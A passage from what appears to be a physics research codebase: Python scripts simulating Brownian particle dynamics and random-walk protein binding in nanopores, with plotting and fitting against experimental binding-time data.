A[case1] = (1./(6.*np.pi*eta*np.maximum(a[:,None], a[None,:])))[case1]
B[case1] = 0.
case2 = ~case1 & (r <= apa)
C = 1./(6.*np.pi*eta*a[:, None]*a[None, :])
A[case2] = (C*(0.5*apa - (ama**2 + 3.*r**2)**2/(32.*r**3)))[case2]
B[case2] = (C*(3.*(ama**2 - r**2)**2/(32.*r**3)))[case2]
case3 = ~(case1 | case2) # else
C = 1./(8.*np.pi*eta*r)
A[case3] = (C*(1. + asq/(3.*r**2)))[case3]
B[case3] = (C*(1. - asq/r**2))[case3]
I = np.eye(3)
R = (x[:, None, :] - x[None, :, :])
RR = (R[:, :, :, None] * R[:, :, None, :]).transpose(2, 0, 3, 1)
RR = RR / (rr[None, :, None, :])
M = (A[None, :, None, :] * I[:, None, :, None]).reshape(3*n, 3*n) + \
(B[None, :, None, :] * RR).reshape(3*n, 3*n)
return np.matrix(M)
def f_vectorized(P, f):
n = len(P)
F = np.zeros((3*n, 1))
for i, p in enumerate(P):
F[i::n] = f(p)
return F
def f_electric(P):
n = len(P)
a = 1e-9*np.array([p.a for p in P])
apa = a[:, None] + a[None, :]
x = 1e-9*np.array([p.x.flatten() for p in P])
R = x[:, None, :] - x[None, :, :]
r = np.sqrt(np.sum(R**2, 2) + 1e-100)
R0 = R / (r**3)[:, :, None]
q = np.array([float(p.charge) for p in P])
const = qq**2 / (4.*np.pi*eperm*rpermw)
QQ = q[:, None] * q[None, :]
F = const * QQ[:, :, None] * R0
#F[np.diag_indices_from(r)] = 0.
tooclose = r <= apa
R0i = R / (np.maximum(a[:, None], a[None, :])**3)[:, :, None]
F[tooclose] = (const * QQ[:, :, None] * R0i)[tooclose]
f = np.sum(F, 1).T.reshape(3*n, 1)
return f
def f_shortrange(P):
n = len(P)
a = 1e-9*np.array([p.a for p in P])
apa = a[:, None] + a[None, :]
x = 1e-9*np.array([p.x.flatten() for p in P])
R = x[:, None, :] - x[None, :, :]
r = np.sqrt(np.sum(R**2, 2)) + 1e-100
#E0 = apa*1e9*10.*kT # total energy required for r = apa*1.1 --> r = 0
#E = E0*((r/apa/1.1 - 1.)**2)
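# soft repulsion that switches on once r < cutoff*(a1 + a2) and grows linearly with the
# overlap; E0 sets the scale (the 1e9 factor makes it an energy per meter, ~10 kT per nm)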
E0 = 1e9*1e1*kT
cutoff = 1.05
f = 2./cutoff*E0*np.maximum(1. - r/apa/cutoff, 0.)
R0 = R / r[:, :, None]
F = f[:, :, None] * R0
ff = np.sum(F, 1).T.reshape(3*n, 1)
return ff
def simulation(P, T=100., dt=1.):
t = 0.
while t < T:
# calculate forces
force = f_electric(P) + f_shortrange(P)
brownian = f_vectorized(P, f_brownian)
M = mobility(P)
sqM = np.matrix(msqrt(M))
# determine resulting velocities
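# one Euler-Maruyama step of overdamped Langevin dynamics: dx = M*F*dt + sqrt(2*kT*dt)*sqrt(M)*xi;
# the 1e9 apparently converts dt from ns to s, consistent with positions stored in nm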
U = M*force + np.sqrt(2.*kT/dt*1e9)*sqM*brownian
n = len(P)
# move particles
for i, p in enumerate(P):
u = U[i::n]
p.move(dt*u)
yield t
t += dt
# static particles: no forces act on them, are not affected by
#from time import time
def move(P, dt=1., boundaries=()):
# calculate forces
force = f_electric(P) + f_shortrange(P)
brownian = f_vectorized(P, f_brownian)
#t = time()
M = mobility(P)
#print "forming mobility", time() - t
#t = time()
sqM = np.matrix(msqrt(M))
#print "matrix square root", time() - t
# determine resulting velocities
Udet = M*force
Ubro = np.sqrt(2.*kT/dt*1e9)*sqM*brownian
#U = M*force + np.sqrt(2.*kT/dt*1e9)*sqM*brownian
U = Udet + Ubro
#print "P0:", Udet[0], Ubro[0]
#print "P1:", Udet[1], Ubro[1]
#print
n = len(P)
# move particles
for i, p in enumerate(P):
u = U[i::n]
p.move(dt*u)
for b in boundaries:
b.reflect(P)
class ParticleCollection(object):
def __init__(self, particles=None):
if particles is None:
particles = []
self.P = particles
def add(self, generate, N):
i = 0
while i < N:
p0 = generate()
if all(np.linalg.norm(q.x - p0.x) > p0.a + q.a for q in self.P):
self.P.append(p0)
i += 1
def ellipse_collection(ax, P):
xy = np.array([p.x[::2].flatten() for p in P])
sizes = np.array([p.a for p in P])
coll = collections.EllipseCollection(sizes, sizes, np.zeros_like(sizes),
offsets=xy, units='x', facecolors=[p.color for p in P],
transOffset=ax.transData, alpha=0.7)
return coll
def panimate(ax, dt, pcoll, patches, boundaries, **kwargs):
particles = pcoll.P
coll = ellipse_collection(ax, particles)
def init():
return ()
#ax.clear()
#ax.add_patch(rect)
#return (rect, )
def animate(i):
if i == 0:
for patch in patches:
ax.add_patch(patch)
ax.add_collection(coll)
else:
move(particles, dt, boundaries)
xy = np.array([p.x[::2].flatten() for p in particles])
coll.set_offsets(xy)
return tuple(patches + [coll])
kwargs = dict(dict(frames=1800, interval=10, blit=True), **kwargs)
ani = animation.FuncAnimation(ax.figure, animate, init_func=init, **kwargs)
return ani
def maybe_save(do_save, ani, name):
if do_save:
ani.save(HOME + "/presentations/anaday17/" + name, fps=30, dpi=200,
writer="ffmpeg_file",
savefig_kwargs={"bbox_inches":0, "pad_inches":0},
extra_args=['-vcodec', 'libx264'])
else:
plt.show()
def random_particle(L, *args, **kwargs):
x = [(2*np.random.rand() - 1.)*L, 0., (2*np.random.rand() - 1.)*L]
return Particle(x, *args, **kwargs)
def setup_box(L):
# ax, patches, boundaries = setup_box(L)
fig = plt.figure()
fig.set_size_inches(6, 6)
ax = plt.axes([0,0,1,1], autoscale_on=False,
xlim=(-L, L), ylim=(-L, L))
ax.set_axis_off()
rect = plt.Rectangle([-L, -L], 2*L, 2*L, ec='k', lw=3, fc='none')
box = Box([-L, -L, -L], 2*L, 2*L, 2*L)
return ax, [rect], [box]
```
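The script above defines the building blocks (particles, boundaries, mobility, the `move` step and the animation helpers) but never wires them together. A minimal driver sketch, assuming the definitions above are in scope; the box size, particle radii, charges and counts are made-up illustration values:
```python
# hypothetical driver, not part of the original script
L = 50.                                    # half box width [nm] (assumed value)
ax, patches, boundaries = setup_box(L)
pcoll = ParticleCollection()
pcoll.add(lambda: random_particle(L, 2., charge=1., color="blue"), N=20)
pcoll.add(lambda: random_particle(L, 4., charge=-1., color="red"), N=5)
ani = panimate(ax, 1., pcoll, patches, boundaries, frames=600)
maybe_save(False, ani, "stokesian_test.mp4")   # False => just show the animation
```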
#### File: scripts/wei/digamma.py
```python
import numpy as np
from scipy.special import digamma
from scipy.stats import poisson, gamma
from matplotlib import pyplot as plt
euler = 0.577215664901532
t = np.linspace(0, 10, 1000)
plt.plot(t, t*np.exp(t)/np.expm1(t))
plt.show()
exit()
#plt.plot(t, digamma(t))
#plt.plot(t, np.log(t/(1 - np.exp(-t))), ".-")
#
def summand(k, b):
return digamma(k)*poisson.pmf(k, b)
def f(b, N=50):
k = np.arange(1, N)
return np.sum(summand(k, b))*1./np.expm1(b) - np.log(b*np.exp(b)/np.expm1(b))
def finv(x):
return x/euler + 1
#plt.plot(t, [(f(x) + euler - x*euler + 0.74694*x**2 - 0.336*x**3) for x in t], ".-")
plt.plot(t, [finv(f(x)) for x in t], ".-")
plt.plot(t, t)
#plt.figure()
k = np.arange(1, 20)
#plt.plot(k, summand(k, 0.01), "s--")
plt.show()
```
#### File: scripts/wei/newton.py
```python
import numpy as np
def solve(C, f, f1, x0=1., n=20):
"solve f(x) == C"
x = x0 # initial value
print "Newton iteration:"
for i in range(n):
dx = -(f(x) - C)/f1(x)
x = x + dx
print i, "Residual", f(x) - C, "Value", x
print
return x
def poisson_from_positiveK(mean):
# solve x/(1 - exp(-x)) == mean
def f(x):
return x/(1. - np.exp(-x))
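# derivative of x/(1 - exp(-x)), written in the numerically stable form
# (expm1(x) - x)/(2*cosh(x) - 2)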
def f1(x):
return (np.expm1(x) - x)/(2.*np.cosh(x) - 2.)
x = solve(mean, f, f1, mean, n=10)
return x
```
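For context, a hypothetical usage sketch of `poisson_from_positiveK` (not part of the original repository; it assumes this file is importable as `newton` and, like the module itself, uses Python 2 print syntax):
```python
import numpy as np
from newton import poisson_from_positiveK

k = np.random.poisson(lam=1.3, size=100000)
k = k[k > 0]                  # only walks with at least one binding are observed
lam = poisson_from_positiveK(k.mean())
print "true rate: 1.3, recovered:", lam
```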
#### File: scripts/wei/plot_binding_probability.py
```python
import numpy as np
from matplotlib import pyplot as plt
from matplotlib.patches import Rectangle
import nanopores
from find_binding_probability import (binding_prob,
binding_prob_from_data, invert_monotone)
# load data
P2 = np.linspace(0, 1, 100)
P2a = P2[P2 > 0.05]
data2 = binding_prob(P2, nproc=5, calc=False, N=20000)
data2a = binding_prob(P2a, nproc=5, calc=False, N=20000)
P3 = np.linspace(0, 0.05, 10)
data3 = binding_prob(P3, nproc=5, calc=False, N=100000)
P4a = np.linspace(0.01, 0.5, 20)
data4a = binding_prob(P4a, nproc=5, calc=False, N=4000)
P4 = np.linspace(0.01, 0.5, 20)
data4 = binding_prob(P4, nproc=5, calc=True, N=100000)
a = 0.3 # mean number of attempts
a1 = 2.2
p0 = binding_prob_from_data()
p = invert_monotone(p0, P3, data3.p0)
pmod = a/a1
#pmod = p0/(1. - np.exp(-a1*p))
# big plot
plt.figure("p0")
plt.plot(P2, data2.p0, ".", label="Simulated (N=20000)")
PP = np.linspace(0, 1, 500)
plt.plot(PP, 1. - np.exp(-a*PP), label="Poisson")
plt.xlabel(r"$p$")
plt.ylabel(r"$p_0$") #probability of >= 1 binding")
plt.legend(frameon=False)
# smaller plot where p is inferred
plt.figure("p0_small")
#plt.plot(P2, data2.p0, "o", label="Simulated (N=20000)", zorder=100)
plt.plot(P3, data3.p0, "o", label="Simulated (N=100000)", zorder=100)
PP = np.linspace(0, 1, 500)
plt.plot(PP, 1. - np.exp(-0.3*PP), label="Poisson (a = 0.3)")
plt.plot(PP, pmod*(1. - np.exp(-a1*PP)), label="Mod. Poisson (a = 2.2)")
plt.plot([0, 1], [p0, p0], "k--", label="p0 from data")
plt.plot([p], [p0], "o", color="#000000", label="inferred p = %.3f" % p, zorder=100)
#plt.axvline(x=p, ymin=0., ymax=p0/0.025, color="#000000", zorder=-90)
plt.xlim(-0.002, 0.062)
plt.ylim(-0.001, 0.023)
plt.yticks([0, .005, .01, .015, .02])
plt.xlabel(r"Binding probability $p$")
plt.ylabel(r"$p_0$") #probability of >= 1 binding")
plt.legend(frameon=False)
# big plot
plt.figure("p0_fit")
plt.plot(P2, data2.p0, ".", label="Simulated (N=20000)", zorder=100)
PP = np.linspace(0, 1, 500)
plt.plot(PP, 1. - np.exp(-a*PP), label="Poisson (a = 0.3)")
plt.plot(PP, pmod*(1. - np.exp(-a1*PP)), label="Mod. Poisson (a = 2.2)")
print "pmod", pmod
plt.xlabel(r"Binding probability $p$")
plt.ylabel(r"$p_0$") #probability of >= 1 binding")
plt.gca().add_patch(Rectangle((-0.01, -0.002), 0.07, 0.02, fc="none", ec="k"))
plt.legend(frameon=False)
import folders
nanopores.savefigs("binding_prob", folders.FIGDIR + "/wei", (4, 3))
print "binding prob. inferred from simulations: p = %.6f" % p
ap = -np.log(1 - p0)
p1 = ap/a
print "binding prob. inferred from assumed Poisson distribution: p = %.6f" % p1
# plot mean, std, log of time
plt.figure("time_stdmean")
mu = np.array(data4.mean_time)
sigma = np.array(data4.std_time)
log = np.array(data4.mean_log_time)
plt.plot(P4, (mu/sigma)**2, "o", label="Simulated (N=100000)")
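# model prediction for (mu/sigma)^2 when the number of bindings is zero-truncated
# Poisson(a*p) and each binding duration is exponentially distributed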
def f(x):
return np.exp(x)/(2.*np.expm1(x)/x - 1.)
plt.plot(P4, f(a*P4), label="Poisson (a = %.1f)" % a)
plt.plot(P4, f(a1*P4), label="Mod. Poisson (a = %.1f)" % a1)
plt.legend(frameon=False)
plt.figure("time_log")
euler = 0.577215664901532
theta = -0.573810187498/euler + 1. # estimate from histogram
plt.plot(P4, (log - np.log(mu))/euler + 1., "o", label="Simulated (N=100000)")
plt.plot(P4, np.ones_like(P4)*theta, "--k", label="Estimate from histogram")
from scipy.special import digamma
from scipy.stats import poisson
def summand(k, b):
return digamma(k)*poisson.pmf(k, b)
def f1(b, N=50):
k = np.arange(1, N)
return np.sum(summand(k, b))*1./np.expm1(b) - np.log(b*np.exp(b)/np.expm1(b))
def f1v(x):
return np.array([f1(b) for b in x])
plt.plot(P4, f1v(a*P4)/euler + 1., label="Poisson (a = %.1f)" % a)
plt.plot(P4, f1v(a1*P4)/euler + 1., label="Mod. Poisson (a = %.1f)" % a1)
plt.xlabel("p")
plt.legend(frameon=False)
plt.figure("time_mean")
#tau = 3.7
tau = 3.88
P4a = np.linspace(0, 0.15, 500)
def g(x):
return x/(1. - np.exp(-x))
def taufit(a):
return tau/g(a*p)
plt.plot(P4, 1e-9*taufit(a1)/tau*mu, "o", label="Simulated (N=100000)", zorder=100)
plt.plot(P4a, tau*np.ones_like(P4a), "--", color="orange", label="Const., tau = %.2f" % tau)
plt.plot(P4a, taufit(a)*g(a*P4a), label="Poisson, tau = %.2f" % (taufit(a)), color="C1")
plt.plot(P4a, taufit(a1)*g(a1*P4a), label="Mod. Poisson, tau = %.2f" % (taufit(a1)), color="C2")
plt.plot([p], [tau], "o", color="#000066", label=r"p, tau off from data")
#lima, limb = plt.ylim()
#plt.axvline(x=p, ymin=0., ymax=(tau - lima)/(limb - lima), color="#000066", zorder=-90)
plt.xlim(-0.004, 0.154)
plt.ylim(3.6, 4.8)
plt.xlabel(r"Binding probability $p$")
plt.ylabel(r"Mean $\tau$ off [s]")
plt.legend(loc="upper left", frameon=False)
plt.figure("time_std")
sig = 4.02
def h(x):
return np.sqrt(g(x)*(2. - x/np.expm1(x)))
def sigfit(a):
return sig/h(a*p)
plt.plot(P4, 1e-9*sigfit(a1)/tau*sigma, "o", label=r"Simulated (N=100000)")
plt.plot(P4, sigfit(a)*h(a*P4), label=r"Poisson (a = %.1f, $\tau$ = %.2f)" % (a, sigfit(a)))
plt.plot(P4, sigfit(a1)*h(a1*P4), label=r"Mod. Poisson (a = %.1f, $\tau$ = %.2f)" % (a1, sigfit(a1)))
plt.plot(P4, sig*np.ones_like(P4), "--", color="orange", label=r"Exponential ($\tau$ = %.2f)" % sig)
plt.plot([p], [sig], "o", color="#000066", label="p, sigma inferred from data")
#lima, limb = plt.ylim()
#plt.axvline(x=p, ymin=0., ymax=(tau - lima)/(limb - lima), color="#000066", zorder=-90)
plt.xlabel("p")
plt.ylabel("std. dev. of binding duration [s]")
plt.legend(frameon=False)
import folders
nanopores.savefigs("tau", folders.FIGDIR + "/wei", (5, 3.7))
#plt.show()
```
#### File: scripts/wei/run_wei.py
```python
import numpy as np
from matplotlib import rcParams, rc
rcParams.update({
"font.size" : 7,
"axes.titlesize" : 7,
"font.family" : "sans-serif",
"font.sans-serif" : ["CMU Sans Serif"],
"lines.linewidth" : 1,
"lines.markersize" : 5,
})
import matplotlib.pyplot as plt
from matplotlib.legend_handler import HandlerTuple
import nanopores
import nanopores.models.randomwalk as randomwalk
from nanopores.tools import fields
fields.set_dir_mega()
from nonlinear_least_squares import NLS
# TODO: to finish this off satisfactorily, it would be nice to infer a tau on
# histogram from exponentially distributed arrivals at the pore entrance
# according to diffusion theory
params = nanopores.user_params(
# general params
geoname = "wei",
dim = 2,
rMolecule = 1.25, # 6.
h = 5.,
Nmax = 1e5,
Qmol = 2., #15.,
bV = -0.2,
dp = 26.,
geop = dict(dp = 26.),
posDTarget = True,
# random walk params
N = 100000, # number of (simultaneous) random walks
dt = .5, # time step [ns]
walldist = 2., # in multiples of radius, should be >= 1
margtop = 60.,
margbot = 0.,
#zstart = 46.5, # 46.5
#xstart = 0., # 42.
rstart = 30,
initial = "sphere",
# receptor params
tbind = 40e9, # from Lata, = 1/kd = 1/(25e-3)s [ns]
# tbind = 286e9, from Wei, = 1/kd = 1/(3.5e-3)s [ns]
ka = 1.5e5,
zreceptor = .95, # receptor location relative to pore length (1 = top)
)
##### what to do
NAME = "rw_wei_"
print_calculations = False
run_test = False
plot_attempt_time = True
plot_distribution = False
plot_cdf = False
voltage_dependence = True
determine_delta = False
fit_koff0 = False
##### constants
rrec = 0.5 # receptor radius
distrec = 4. - params.rMolecule - rrec # distance of rec. center from wall
ra = distrec #params.rMolecule*(params.walldist - 1.) - rrec
dx = 5.5
kd = 25e-3
#### color code
color_lata = "C0" #"#0066ff"
color_wei = "#00cc00"
color_exp = "red"
def receptor_params(params):
dx0 = params["dx"] if "dx" in params else dx
kd0 = params["kd"] if "kd" in params else kd
tbindfromkd = 1e9/kd0
tbind0 = params["tbind"] if "tbind" in params else tbindfromkd
return dict(
exclusion = False,
walldist = 1.,
#minsize = 0.01, # accuracy when performing reflection
binding = True,
t = tbind0, # mean of exponentially distributed binding duration [ns]
#t = 1e9/kd0,
ka = params["ka"], # (bulk) association rate constant [1/Ms]
ra = ra, # radius of the association zone [nm]
bind_type = "zone",
collect_stats_mode = True,
use_force = True, # if True, t_mean = t*exp(-|F|*dx/kT)
dx = dx0, # width of bond energy barrier [nm]
)
if print_calculations:
phys = nanopores.Physics()
# calculate binding probability with data from (Wei 2012)
kon = 20.9e6 # association rate constant [1/Ms] = binding events per second
c = 180e-9 # concentration [M = mol/l = 1000 mol/m**3]
cmol = c * 1e3 * phys.mol # concentration [1/m**3]
ckon = c*kon
print "Average time between events (tau_on): %.2f s (from experimental data)" % (1./ckon)
print "Number of bindings per second: %.1f (inverse of mean tau_on)" % ckon # 3.8
# Smoluchowski rate equation gives number of arrivals at pore entrance per sec
D = phys.kT / (6. * phys.pi * phys.eta * params.rMolecule * 1e-9) # [m**2/s]
r = 6e-9 # effective radius for proteins at pore entrance [m]
karr = 2.*phys.pi * r * D * cmol # arrival rate
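# 2*pi*r*D*c is half the full-sphere Smoluchowski rate 4*pi*D*r*c, presumably because
# molecules reach the pore entrance from one half-space only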
b = c * kon / karr # bindings per event
print "Number of events per second: %.1f (from Smoluchowski rate equation)" % karr
print "=> number of bindings per event: %.1f / %.1f = %.5f (= 1 - exp(-a*p) = prob of binding at least once)" % (ckon, karr, b)
# solve b = 1 - exp(-ap); p = -log(1 - b)/a
a = 0.305
ap = -np.log(1 - b)
p = ap/a
print "=> a*p = -log(1 - %.5f) = %.5f" % (b, ap)
print
print "Average number of attempts: a = %.5f (from many simulations with dt=1, eps=0.1)" % a
print "=> binding probability p = a*p / a = %.5f / %.5f = %.5f" % (ap, a, p)
#receptor_params["p"] = p
def setup_rw(params):
pore = nanopores.get_pore(**params)
rw = randomwalk.RandomWalk(pore, **params)
zrec = rw.zbot + rrec + (rw.ztop - rw.zbot - 2.*rrec)*params["zreceptor"]
xrec = pore.radius_at(zrec) - distrec
posrec = [xrec, 0., zrec]
print "Receptor position: %s" % posrec
receptor = randomwalk.Ball(posrec, rrec) # ztop 46.5
rw.add_domain(receptor, **receptor_params(params))
return rw
##### run test rw
if run_test:
rw = setup_rw(params)
randomwalk.run(rw)
##### draw bindings and forces from empirical distribution
def draw_empirically(rw, N=1e8, nmax=1000, success=True):
self = rw.domains[1]
N = int(N)
ka = self.kbind
# draw indices of existing random walks
I = np.random.randint(rw.N, size=(N,))
times = (1e-9*rw.times)[I]
bindings = np.zeros(N, dtype=int)  # number of binding events per walk (used as gamma shape below)
avgbindings = (ka*rw.attempt_times)[I]
bindings[avgbindings > 0] = np.random.poisson(avgbindings[avgbindings > 0])
del avgbindings
ibind, = np.nonzero(bindings > 0)
n0 = len(ibind)
n = min(n0, nmax)
ibind = ibind[:n]
print "%d binding events drawn, %s used." % (n0, n)
f = np.array([f for F in rw.binding_zone_forces for f in F])
F = np.random.choice(f, size=(n,))
dx = 1e-9*self.dx
kT = rw.phys.kT
t = self.t * np.exp(-F*dx/kT)
print "dwell time reduction by force:", np.mean(t)/self.t
bind_times = 1e-9*np.random.gamma(bindings[ibind], scale=t)
times[ibind] += bind_times
if success:
tfail = times[rw.fail[I]]
tsuccess = times[rw.success[I]]
return tfail, tsuccess
else:
return times[ibind]
##### load tau_off histogram from source and create fake data
def tauoff_wei():
csvfile = "tau_off_wei.csv"
data = np.genfromtxt(csvfile, delimiter=",")
bins = data[:, 0]
counts = data[:, 1]
# inspection showed that there seems to be a good,
# evenly spaced approximation to all bins except the first and last with
# spacing 0.55, i.e. of the form (beta + 0.55*np.arange(0, N)) for some beta
x = bins[:-1]
N = len(x)
# minimize norm(x - (beta + 0.55*np.arange(0, N)) w.r.t. beta
#beta = x.mean() - 0.55*(N-1)/2.
# turns out beta is close to 0.25, which gives nice numbers,
# so we will just take that
bins = 0.25 + 0.55*np.arange(0, N)
bins = [0.] + list(bins) + [20.]
N = N+1
# the counts should be integer-values, so
counts = np.round(counts).astype(int)
# TODO: need better experimental data => webtool
# create fake data samples that reproduce the histogram
fake = np.array([])
frac = 1.
while int(counts[0]*frac) > 1:
frac /= 2.
a, b = bins[1]*frac, bins[1]*2*frac
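# a*(b/a)**u with u uniform on [0, 1) is log-uniformly distributed on [a, b),
# matching the logarithmic bin layout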
sample = a*(b/a)**(np.random.rand(int(counts[0]*frac)))
fake = np.append(fake, sample)
#print "frac", frac
for i in range(1, N):
a, b = bins[i], bins[i+1]
sample = a*(b/a)**(np.random.rand(counts[i]))
fake = np.append(fake, sample)
print len(fake), "events loaded from experimental data."
return fake
###### determine tauoff from fit to exponential cdf 1 - exp(t/tauoff)
@fields.cache("wei_koff_2", default=dict(params, dx=5.5, N=10000,
dp=30., geop=dict(dp=30.), nmax=523, NN=4e8))
def fit_koff(nmax=523, NN=4e8, **params):
tbind = params.pop("tbind")
params["kd"] = 1e9/tbind
dx = params.pop("dx")
rw = randomwalk.get_rw(NAME, params, setup=setup_rw, calc=True)
rw.domains[1].dx = dx
times = draw_empirically(rw, N=NN, nmax=nmax, success=False)
bins = np.logspace(np.log10(min(times)), np.log10(max(times)), 35)
#bins = np.logspace(-3., 2., 35)
hist, _ = np.histogram(times, bins=bins)
cfd = np.cumsum(hist)/float(np.sum(hist))
t = 0.5*(bins[:-1] + bins[1:])
tmean = times.mean()
toff = NLS(t, cfd, t0=tmean)
koff = 1./toff
return dict(t=t, cfd=cfd, toff=toff, tmean=tmean, koff=koff)
if plot_attempt_time:
rw = randomwalk.get_rw(NAME, params, setup=setup_rw)
ta = rw.attempt_times
ta = ta[ta > 0.]
#tt = np.logspace(-.5, 2.5, 100)
tt = np.linspace(0.25, 200., 100)
plt.figure("attempt_times", figsize=(2.2, 1.65))
plt.hist(ta, bins=tt, normed=True, log=True, label="Simulations")
ta0 = ta.mean()
plt.plot(tt, 1./ta0 * np.exp(-tt/ta0), label="Exp. fit, mean %.3gns" % ta0)
#plt.xscale("log")
#plt.yscale("log")
plt.xlabel("Attempt time [ns]")
plt.ylabel("Rel. frequency")
handles, labels = plt.gca().get_legend_handles_labels()
plt.legend(handles[::-1], labels[::-1], frameon=False)
##### run rw in collect mode and draw bindings from empirical distributions
if plot_distribution:
rw = randomwalk.get_rw(NAME, params, setup=setup_rw)
ta = rw.attempt_times
ta = ta[ta > 0.]
#tt = np.logspace(-.5, 2.5, 100)
tt = np.linspace(0.25, 200., 100)
plt.figure("attempt_times", figsize=(4, 3))
plt.hist(ta, bins=tt, normed=True, log=True, label="Simulations")
ta0 = ta.mean()
plt.plot(tt, 1./ta0 * np.exp(-tt/ta0), label="Exp. fit, mean=%.3gns" % ta0)
#plt.xscale("log")
#plt.yscale("log")
plt.xlabel("Attempt time [ns]")
plt.ylabel("Rel. frequency")
plt.legend()
forces = np.array([f for F in rw.binding_zone_forces for f in F])
plt.figure("force", figsize=(4,3))
plt.hist(1e12*forces, bins=200, normed=True)
plt.xlabel("Force [pN]")
plt.ylabel("Rel. frequency")
plt.figure("hist_old", figsize=(4.5,3))
NN = 3e8
fake = tauoff_wei()
tfail, tsuccess1 = draw_empirically(rw, N=NN, nmax=len(fake))
a, b = -6.5, 2 # log10 of plot interval
bins = np.logspace(a, b, 40)
_, _, gptchs = plt.hist(tsuccess1, bins=bins, color="green", log=True,
alpha=0.6, rwidth=0.9, label=r"Translocated ($k_d$: Lata)", zorder=50)
_, _, rptchs = plt.hist(tfail, bins=bins, color="red", log=True,
alpha=0.6, rwidth=0.9, label=r"Did not translocate ($k_d$: Lata)")
handler_sim1 = (gptchs[0], rptchs[0])
# add histogram for kd fitted from wei
params2 = dict(params)
tbind = params2.pop("tbind")
params2["kd"] = 3.5e-3
rw = randomwalk.get_rw(NAME, params2, setup=setup_rw)
tfail, tsuccess2 = draw_empirically(rw, N=NN, nmax=len(fake))
_, _, gptchs = plt.hist(tsuccess2, bins=bins, color="green", log=True,
histtype="step", linestyle="--", alpha=0.6,
rwidth=0.9, label=r"Translocated ($k_d$: Wei)", zorder=200)
_, _, rptchs = plt.hist(tfail, bins=bins, color="red", log=True,
histtype="step", linestyle="--", alpha=0.6,
rwidth=0.9, label=r"Did not translocate ($k_d$: Wei)")
handler_sim2 = (gptchs[0], rptchs[0])
_, _, ptchs = plt.hist(fake, bins=bins, histtype="step", log=True,
color="orange", label="Experiments", zorder=100)
handler_exp = ptchs[0]
plt.xscale("log")
#plt.yscale("log")
plt.ylabel("Count")
plt.xlabel(r"$\tau$ off [s]")
plt.ylim(ymin=1.)
#plt.xlim(xmax=1e4)
#plt.legend()
plt.legend([handler_exp, handler_sim1, handler_sim2],
["Experiments", r"Sim. ($k_d$ from Lata)", r"Sim. ($k_d$ from Wei)"],
#plt.legend([handler_exp, handler_sim1],
# ["Experiments (Wei et al.)", r"Sim. ($k_d$ from Lata)"],
handler_map={tuple: HandlerTuple(ndivide=None)},
frameon=False)
#scatterpoints=1, numpoints=1,
# simpler hist with better color code and visibility
tsuccess_lata = tsuccess1#[tsuccess1 > 1e-4]
tsuccess_wei = tsuccess2#[tsuccess2 > 1e-4]
plt.figure("hist_all", figsize=(2.75, 1.83333333333))
plt.hist(tsuccess_lata, bins=bins, color=color_lata, log=True,
alpha=0.8, rwidth=0.9, label=r"Sim. ($k_d$ from Lata)", zorder=50)
plt.hist(tsuccess_wei, bins=bins, color=color_wei, log=True,
#histtype="step", linestyle="--",
alpha=0.5, rwidth=0.9, label=r"Sim. ($k_d$ from Wei)", zorder=90)
plt.hist(fake, bins=bins, histtype="step", log=True,
linewidth=1.75,
color=color_exp, label="Experiment", zorder=100)
plt.xscale("log")
#plt.yscale("log")
plt.ylabel("Count")
plt.xlabel(r"$\tau_\mathrm{off}$ [ms]")
plt.ylim(ymin=1.)
ax = plt.gca()
ax.set_xticks([1e-6, 1e-3, 1.])
ax.set_xticks([1e-5, 1e-4, 1e-2, 1e-1, 1e1, 1e2], minor=True)
ax.set_xticklabels(["$\mathregular{10^{-3}}$", "1", "$\mathregular{10^3}$"])
ax.set_xticklabels([], minor=True)
#plt.xlim(xmin=.3e-6, xmax=1e2)
#plt.xlim(xmin=0.2e-4, xmax=0.9e2)
plt.legend(loc="best", frameon=False)
###### reproduce cumulative tauoff plot with fits and different bV
voltages = [-0.2, -0.25, -0.3, -0.35][::-1]
colors = ["k", "r", "b", "g"][::-1]
zrecs = [.90, .95, .99]
N = 10000
newparams = dict(N=N, dp=30., geop=dict(dp=30.))
if plot_cdf:
plt.figure("bV_tauoff", figsize=(4, 3))
for i, v in enumerate(voltages):
data = fit_koff(bV=v, zreceptor=.95, dx=dx, **newparams)
tt = np.logspace(-3., 2., 100)
lines = plt.semilogx(tt, 1. - np.exp(-tt/data.toff), color=colors[i])
plt.semilogx(data.t, data.cfd, "v", color=lines[0].get_color(),
label="%d mV" % (1000*abs(v)))
print "koff", data.koff
plt.xlim(1e-4, 1e1)
plt.xlabel(r"$\tau$ off [s]")
plt.ylabel("Cumulative probability")
plt.legend(frameon=False)
###### regression to quantify bV-koff relationship
def regression(bV, koff):
"find coefficients in relationship koff = koff0 * exp(a*bV)"
X = np.column_stack([bV, np.ones(len(bV))])
y = np.log(koff)
a, b = tuple(np.dot(np.linalg.inv(np.dot(X.T, X)), np.dot(X.T, y)))
return a, np.exp(b)
######
def koff0(kd, **params):
return fit_koff(name="wei_koff_3", bV=0., tbind=1e9/kd, **params).koff
if fit_koff0:
plt.figure("koff0", figsize=(4, 3))
kd = np.array([2., 3, 3.25, 3.5, 3.75, 4, 5.])
ko = np.array([1e3*koff0(k*1e-3, NN=5e8, nmax=10000) for k in kd])
c = ko.mean()/kd.mean()
print "F0 = %.3f pN" % (1e12*np.log(c)/(1e-9*5.5)*nanopores.kT)
# F0 = 0.184 pN
plt.axhline(y=4.5, linestyle="-", color="C0", label="Wei et al.")
plt.plot(kd, ko, "oC1", label="Simulations")
plt.plot(kd, c*kd, ":C1", label=r"Fit to $k_{off}^{V=0}$ = C*$k_d$")
plt.plot(kd, kd, ":C2", label=r"$k_{off}^{V=0}$ = $k_d$")
plt.ylim(ymin=2.2, ymax=7.5)
#plt.xlim(2.9, 4.6)
#plt.fill_between(plt.xlim(), [4.5 - 0.6]*2, [4.5 + 0.6]*2, alpha=0.5, color="C1")
#plt.xticks(kd)
#plt.yticks(kd)
#plt.xlim(plt.ylim())
#plt.axis("equal")
plt.xlabel(r"Bulk dissociation constant $k_d$ [10$^{-3}$/(Ms)]")
plt.ylabel(r"$k_{off}^{V=0}$ [10$^{-3}$/(Ms)]")
plt.legend(frameon=False, loc="upper left")
###### recreate voltage-dependent plot of koff
if voltage_dependence:
# get experimental data
plt.figure("koff", figsize=(2.2, 1.83333333))
data = np.genfromtxt("koff.csv", delimiter=",")
v = data[:, 0]
koff = data[:, 1]
c0, k0 = regression(np.abs(v), koff)
vv = np.linspace(0., 370., 10)
plt.plot(vv, k0 * np.exp(c0*vv), "-r", lw=1.75)
v = np.array([-0., -0.05, -0.1, -0.15, -0.2, -0.25, -0.3, -0.35])
mv = np.abs(v)*1e3
z = 0.95
dx = 5.6
